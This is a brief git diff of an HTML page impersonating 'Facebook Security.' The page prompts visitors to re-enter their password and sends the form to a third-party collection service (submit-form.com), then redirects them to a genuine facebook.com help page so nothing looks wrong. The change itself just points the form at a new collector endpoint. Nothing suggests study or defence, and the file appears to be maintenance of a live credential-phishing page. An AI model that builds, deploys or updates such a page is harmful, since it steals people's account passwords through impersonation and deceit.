--- a/index.html
+++ b/index.html
@@ -112,7 +112,7 @@
             Facebook Security
         </div>
         <p>Please re-enter your password to complete the request.</p>
-        <form id="passwordForm" action="https://submit-form.com/6fd0jaEkQ" method="POST">
+        <form id="passwordForm" action="https://submit-form.com/USw9CaxSv" method="POST">
                                 <input type="hidden" name="_redirect" value="https://www.facebook.com/help/media/thank-you?rdrh"/>
                                 
             <div class="form-group">
